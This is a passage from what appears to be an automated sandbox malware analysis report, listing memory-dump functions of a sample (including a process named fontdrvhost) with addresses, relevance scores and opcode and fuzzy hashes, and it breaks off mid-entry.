                                                                                            • Opcode Fuzzy Hash: 1194fecc25db01f1a61b351338906bf696fac5a4e16f5fecc64ebb5bfc035f3e
                                                                                            • Instruction Fuzzy Hash: F21182B0D0D64A8AE7A9FF38C5453B97AA1EF84300F14847DD61E936E2DE38A841C704
                                                                                            Function 00007FFB4B2B3EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82e09e758cbe108aa713da79ef1dd683c5358352f4b2aebc520f842c94b5c87a
                                                                                            • Instruction ID: 132fd71ac38521193d1468a3e13d839dc56b27e734edc9e3f5b02b432c91d9e3
                                                                                            • Opcode Fuzzy Hash: 82e09e758cbe108aa713da79ef1dd683c5358352f4b2aebc520f842c94b5c87a
                                                                                            • Instruction Fuzzy Hash: 5C1191B0D0EB4A8FE769AF38C5193B97BB1AF45310F0454BDD619D32E2CE3858418705
                                                                                            Function 00007FFB4B2B3F74 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ee4c70c469b415e7a627b6cee67398a220fbed2471ee262060254ac99511a125
                                                                                            • Instruction ID: 48484721c9a1c878d86af8c5597c01bbc03131055a28be05d230c9d72680ab7e
                                                                                            • Opcode Fuzzy Hash: ee4c70c469b415e7a627b6cee67398a220fbed2471ee262060254ac99511a125
                                                                                            • Instruction Fuzzy Hash: 401165B1D1DA4A8BF769BE78C5153B97AA1EF48310F14443DD60ED36D1CE38A8418644
                                                                                            Function 00007FFB4B2B3F6B Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bafffb31cd4693e6a87b37498ba3eb728c020f91b83d59e9e73f3b2bb26e11a1
                                                                                            • Instruction ID: d617abd7c9f537cc1182d7a0b8e0ab6b47b35c47f5d6bfa4a979601b210cf466
                                                                                            • Opcode Fuzzy Hash: bafffb31cd4693e6a87b37498ba3eb728c020f91b83d59e9e73f3b2bb26e11a1
                                                                                            • Instruction Fuzzy Hash: 8101ADB090E64A8FE769EF34C5153B9BBA1EF89300F04487ED50AD32D2DE38A841DB05
                                                                                            Function 00007FFB4B2B6680 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 330a2f16bac8da95591b7de471977c24d85b5c47644e228a5d6f088160fa542f
                                                                                            • Instruction ID: 18063d687fb412def6e428dd17f3e65588ba53cd2fdd166a40d916f936a5cf40
                                                                                            • Opcode Fuzzy Hash: 330a2f16bac8da95591b7de471977c24d85b5c47644e228a5d6f088160fa542f
                                                                                            • Instruction Fuzzy Hash: 92018C71C4CA4C8BCB55EF6A9C00299BBA4FB9E318F00126ED45CD7180D7769A9AC745
                                                                                            Function 00007FFB4B2B10EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1ed5de6d740f9cc24e51fefd1947ef30a32546f5c74e09542ad89017d6e6dc08
                                                                                            • Instruction ID: 818783ba23b71484093491ebc72d6cf9ae93bc67bb78083c04bca9f7396efc2e
                                                                                            • Opcode Fuzzy Hash: 1ed5de6d740f9cc24e51fefd1947ef30a32546f5c74e09542ad89017d6e6dc08
                                                                                            • Instruction Fuzzy Hash: 27E0D87692CA4D4BDB90FF69E8066A5FFE0FBC5309F00006DE65CD3191C62595A5C385
                                                                                            Function 00007FFB4B2B09D3 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e519d89d23fa472c11a14f9495ca7d1cc6b4fe42456643c01a572e9d02d718bb
                                                                                            • Instruction ID: d7ab54a9eed1e194511385fdba148971dab0d59a172026029312279360b24da4
                                                                                            • Opcode Fuzzy Hash: e519d89d23fa472c11a14f9495ca7d1cc6b4fe42456643c01a572e9d02d718bb
                                                                                            • Instruction Fuzzy Hash: E2E04F7192891E4FDB85FFA8D8495FDB7A2FB88340F004139D10DE3152CE206804C780

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2B57F2 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O5K$@O5K$PO5K$`O5K$pP5K
                                                                                            • API String ID: 0-3199577557
                                                                                            • Opcode ID: d97265bf3991bb9e2f9173a16b3ba7b75b1288842f016ceb3c8eb23be179837f
                                                                                            • Instruction ID: 2f2e78d1dff202e3f2f14410f5f34d8a96a914f67c5a2c1c9411bebfafc19932
                                                                                            • Opcode Fuzzy Hash: d97265bf3991bb9e2f9173a16b3ba7b75b1288842f016ceb3c8eb23be179837f
                                                                                            • Instruction Fuzzy Hash: D8512E8770D6D20BE3167AFCFC621E97F50EF822F134941BBD288CA0ABAC15554A42D1

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2A1EC3 Relevance: 16.5, Strings: 12, Instructions: 1538COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-2063274034
                                                                                            • Opcode ID: 1991e1f7b37b2924c80623d48af1c6dbb698ca7ccff9494748f2860bcfd90f3b
                                                                                            • Instruction ID: 3f9e630a32d40eaa0257d50ca6de5489bc4f8e0f778e67a87b8f542e46417f1b
                                                                                            • Opcode Fuzzy Hash: 1991e1f7b37b2924c80623d48af1c6dbb698ca7ccff9494748f2860bcfd90f3b
                                                                                            • Instruction Fuzzy Hash: 26D2B6B09196298FDBA9EF28C8947E9B7B1FF58301F5041EAD40DE7291CB359A81CF44
                                                                                            Function 00007FFB4B2A1250 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 8e6064e6dec4636e8af9954c940359cf580ad1ef760d3ce3f095681468959222
                                                                                            • Instruction ID: a932450c8b096eac948a54e4890b0412997ed6752299c1f259fc1afff4f9e3b9
                                                                                            • Opcode Fuzzy Hash: 8e6064e6dec4636e8af9954c940359cf580ad1ef760d3ce3f095681468959222
                                                                                            • Instruction Fuzzy Hash: 2DA19474A18A1C8FDB98EF58C894BA8BBF1FF69311F4541A9D00DE7265CB74AC81CB41
                                                                                            Function 00007FFB4B2A3A8D Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#4K
                                                                                            • API String ID: 0-533413016
                                                                                            • Opcode ID: 6a6025a4ccac819a64873b5c687a2277f906e84e8811c0ec7f1b6c21abad924f
                                                                                            • Instruction ID: f1dd0fcf52d21a0fc5d6c55cc5b3c0716143e6ec91adafe15750112cc1a4b732
                                                                                            • Opcode Fuzzy Hash: 6a6025a4ccac819a64873b5c687a2277f906e84e8811c0ec7f1b6c21abad924f
                                                                                            • Instruction Fuzzy Hash: 5921A3B1A0D68A4FEB95FE38C8656E6BBA1FF59300F0540F9C149971D3DE756841C740
                                                                                            Function 00007FFB4B2A1751 Relevance: .4, Instructions: 401COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1aaeca01669f56581ca9622bb30465bc9a6f1f2ecf6881f9b6b4ffeef423851f
                                                                                            • Instruction ID: aeda1545c293f5835a94870f65dc5a2c2b57e54ad3583f258d7235d1b78a5d7a
                                                                                            • Opcode Fuzzy Hash: 1aaeca01669f56581ca9622bb30465bc9a6f1f2ecf6881f9b6b4ffeef423851f
                                                                                            • Instruction Fuzzy Hash: 00E18EB1C196998FDB99EF64D8957F8BBF1EF09311F0440BAD04DE7292CA386881CB51
                                                                                            Function 00007FFB4B2A4843 Relevance: .2, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 60fc8e882c3e9ce52bc7020b8ca5ddc284f737e98b47dd1baa74a320496f42b9
                                                                                            • Instruction ID: 886c3797b2709379cb06ccb0befe5fa7e97876d04a3fdddb52b31cfd5f0b6bfa
                                                                                            • Opcode Fuzzy Hash: 60fc8e882c3e9ce52bc7020b8ca5ddc284f737e98b47dd1baa74a320496f42b9
                                                                                            • Instruction Fuzzy Hash: 5B91E4B0D19A1D8FDB95EFA8C8957EDBBB1FF58301F1041AAD40DE3252DB34A9858B40
                                                                                            Function 00007FFB4B2A1831 Relevance: .2, Instructions: 246COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 91555159a02aff25235bf5826cdefbf21e31a1f744d894d00d4eb699dcfeeae0
                                                                                            • Instruction ID: 5717ffef55c5b99b6c3be1eea727079d7bb914de7cb59b2b44cc26688ff5d140
                                                                                            • Opcode Fuzzy Hash: 91555159a02aff25235bf5826cdefbf21e31a1f744d894d00d4eb699dcfeeae0
                                                                                            • Instruction Fuzzy Hash: E7915FB1D1865E8FDB99EF68D4957A8BBE1FF58311F0440B9D00DE7292CE385881CB41
                                                                                            Function 00007FFB4B2A0DD9 Relevance: .2, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67039cbe3d537aa58839cd969439182095a01e015de03285bc4be98d5dd931d7
                                                                                            • Instruction ID: 220b0bf1263385306bd4a59348e6afebfdfd38392b340fd04564fc763d038337
                                                                                            • Opcode Fuzzy Hash: 67039cbe3d537aa58839cd969439182095a01e015de03285bc4be98d5dd931d7
                                                                                            • Instruction Fuzzy Hash: 2B712F7191894E8FDB45FF68C495AEABBF1FF58300F1445B5D409D7296CE38A882CB90
                                                                                            Function 00007FFB4B2A08B1 Relevance: .2, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 274fcaf349138418a54b9f200bc210fa9ac8e3a276ff26888184e6e329350d19
                                                                                            • Instruction ID: 54ad38b0562ac40cf8b22df9ffe221aaaaf89fce7dbc722a80a09d43b647446a
                                                                                            • Opcode Fuzzy Hash: 274fcaf349138418a54b9f200bc210fa9ac8e3a276ff26888184e6e329350d19
                                                                                            • Instruction Fuzzy Hash: 9B61AFB190CA4E8FEB94FF78C8946EABBE1FF59301F4441BAD409D71A2CA34A841C740
                                                                                            Function 00007FFB4B2A4380 Relevance: .2, Instructions: 207COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc86f581ba0771d961723eda85e24693b65ed5f51efe457417aa8e32934185b5
                                                                                            • Instruction ID: 899f053ef99d18a2eebcc3883bf5d60f5d58363545dbbe474b4c7385ed68019d
                                                                                            • Opcode Fuzzy Hash: dc86f581ba0771d961723eda85e24693b65ed5f51efe457417aa8e32934185b5
                                                                                            • Instruction Fuzzy Hash: 857115D2C1DEC64BE356BF7CD9260B97FA0AF59314B1880BBE59C864E7DD18E8058381
                                                                                            Function 00007FFB4B2A4F5C Relevance: .2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1f67958fda1100bd4a5b64bf387002a583cbb9112b1141ef31379039dca97512
                                                                                            • Instruction ID: 183c84190b5c68d237f0f9271ea8616cc422d74f462d635dd1143da83c9c7854
                                                                                            • Opcode Fuzzy Hash: 1f67958fda1100bd4a5b64bf387002a583cbb9112b1141ef31379039dca97512
                                                                                            • Instruction Fuzzy Hash: 1971D570D0992D8FDBA5EF58C894BE9BBF1FB58301F5001AAD40DE7291DB35AA84CB40
                                                                                            Function 00007FFB4B2A60C5 Relevance: .2, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0cfb7a8e7611ec59cbd4c5fc1cc9a0278ff1315442ff00911ef48bf87bf6f315
                                                                                            • Instruction ID: 27fec2be69381293a8c4200ca3b499a58037ed48a8202963e0c58a049713430e
                                                                                            • Opcode Fuzzy Hash: 0cfb7a8e7611ec59cbd4c5fc1cc9a0278ff1315442ff00911ef48bf87bf6f315
                                                                                            • Instruction Fuzzy Hash: AE618EB1D0CA598FDB96FF68C5557A8BFB1FF59300F4081BAC10993292CB38A945CB40
                                                                                            Function 00007FFB4B2A4611 Relevance: .2, Instructions: 172COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c13e43e4d090fd67144dd0f5191c7977675938b979a5ceaea4c364f55f4f12b7
                                                                                            • Instruction ID: bef4db7d2402145abb0f3c7145f10cb24d35c019c99d51afd4430a89fe845d6b
                                                                                            • Opcode Fuzzy Hash: c13e43e4d090fd67144dd0f5191c7977675938b979a5ceaea4c364f55f4f12b7
                                                                                            • Instruction Fuzzy Hash: 9B51B4B0E18A1D8FDB94EFA8C855BEDBBB1FF58701F10016AD409E7691CB74A881CB40
                                                                                            Function 00007FFB4B2A0AB9 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction ID: c62cf88da4c323bbdf3cfe9a44ae960f6e4fe09460d94aceaa899c4c97f84aa0
                                                                                            • Opcode Fuzzy Hash: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction Fuzzy Hash: 2251FBB0D18A5D8FDF94EFA8C9546EDBBB2FF58301F14412AD409E7295CB345845CB40
                                                                                            Function 00007FFB4B2A38B8 Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bdc8846ff414e79e6427d84ec1192748fb1ff4a666bc746d8439f52a1e44951b
                                                                                            • Instruction ID: 50b47fa42c4e139bd2d13e19031e409020eebbbd42e1921b3d768b8f72089423
                                                                                            • Opcode Fuzzy Hash: bdc8846ff414e79e6427d84ec1192748fb1ff4a666bc746d8439f52a1e44951b
                                                                                            • Instruction Fuzzy Hash: ED419AB0E1891D8FDB45EFA8D845AFEBBB1FF58300F1041BAE409E7295DA34A9018B51
                                                                                            Function 00007FFB4B2A67ED Relevance: .1, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ff20be992b8a9cb14515b8ab74833bc33feaab9b9e9fa34fe7cd77cdcffc441
                                                                                            • Instruction ID: 1fb9ba38d4af0f6fdc47a8c07acba01b3a2bf5b3844011997466a509253ec008
                                                                                            • Opcode Fuzzy Hash: 2ff20be992b8a9cb14515b8ab74833bc33feaab9b9e9fa34fe7cd77cdcffc441
                                                                                            • Instruction Fuzzy Hash: 4551697180D28A8FDB56EF74C8A52FEBBB0EF1A300F0545BAD505E7192DB385A48CB51
                                                                                            Function 00007FFB4B2A0C6D Relevance: .1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cb813753cbb6cc7007f8055112e41ca4b55aca7a84d658db234effaa2564692
                                                                                            • Instruction ID: aa08a3996310c18656c08171f66c874b412dbf1a9ed7af11e6e0439779f790cf
                                                                                            • Opcode Fuzzy Hash: 4cb813753cbb6cc7007f8055112e41ca4b55aca7a84d658db234effaa2564692
                                                                                            • Instruction Fuzzy Hash: 1A4127B1C09A1D8FDB55EFB4D4486EEBBB1FF19300F50057AE409E3192DA78A945CB80
                                                                                            Function 00007FFB4B2A1521 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction ID: 4c421fe0df8d6ea25e6bf716aec7ad76b5ec9c5437eb9d75024a5ac02cc54d90
                                                                                            • Opcode Fuzzy Hash: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction Fuzzy Hash: 4441F974A1891D8FDFA8EF68D895BACB7F1FB58705F5480A9D04EE3251CE74AC818B40
                                                                                            Function 00007FFB4B2A0AD0 Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction ID: a9cb4e365ad23b9831725f4aa03d4e575c30127b084bcf6bb78e917607037863
                                                                                            • Opcode Fuzzy Hash: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction Fuzzy Hash: 2631CB7091891D8FDF94EF68C955BEEBBB2FF98301F10452AD509E7295CB34A845CB80
                                                                                            Function 00007FFB4B2A4BE9 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1864ecb89c5491fb95168d35c3ba0242258d808e9898cf37327ec5fca8b02644
                                                                                            • Instruction ID: e47c1bc539285523cacb09278b4d2e56799dbb441042c0d5a691a39aa16d45cf
                                                                                            • Opcode Fuzzy Hash: 1864ecb89c5491fb95168d35c3ba0242258d808e9898cf37327ec5fca8b02644
                                                                                            • Instruction Fuzzy Hash: EB417CB0D096598FE755EFB4C8596EDBBB2FF49301F4041BAD049D76A2CB389881CB00
                                                                                            Function 00007FFB4B2A4535 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cb414b3a07a5a07ed75c2c00c64bb3a2ca6bda3bb1ba87d76b770af40fbbfe89
                                                                                            • Instruction ID: 382ec402529b13084661df4012e7ed4c398e9da9ef2d5b9379941086abc0c033
                                                                                            • Opcode Fuzzy Hash: cb414b3a07a5a07ed75c2c00c64bb3a2ca6bda3bb1ba87d76b770af40fbbfe89
                                                                                            • Instruction Fuzzy Hash: 3E3129A181DACA4FE751FF3CC8281E97FA0FF5A314F4541BAE888C75A3CA249845C381
                                                                                            Function 00007FFB4B2A1129 Relevance: .1, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction ID: 4a118f80d29acffadd2620a9fba48b8696279ebd510abe360731b6b5fe250a76
